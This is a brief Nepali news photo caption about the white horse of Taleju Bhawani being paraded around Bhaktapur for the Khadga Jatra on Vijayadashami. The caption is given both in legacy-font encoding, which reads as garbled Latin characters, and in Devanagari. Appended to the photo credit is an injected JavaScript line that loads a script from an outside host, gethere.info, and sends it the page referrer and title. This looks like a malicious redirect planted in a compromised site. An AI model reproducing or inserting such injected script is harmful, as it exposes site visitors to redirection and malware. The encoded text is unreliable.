eQmk'/ l:yt tn]h' ejfgLsf] jfxgsf] ?kdf /x]sf] ;]tf] 3f]8fnfO{ gu/ kl/qmdf u/fO{ u/fpFb}} . ut sflQs b]vL 3f]8f lalxg ePsf] tn]h'df ljhofbzdLsf] lbg v8u hfqf dgfpg 3f]8f NofO{Psf] xf] . tl:a/ M /d]z lu/L, eQmk'/ . /f;;

भक्तपुर स्थित तलेजु भवानीको वाहनको रुपमा रहेको सेतो घोडालाई नगर परिक्रमा गराई गराउँदैै । गत कात्तिक देखी घोडा बिहिन भएको तलेजुमा विजयादशमीको दिन खड्ग जात्रा मनाउन घोडा ल्याईएको हो । तस्बिर: राससs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;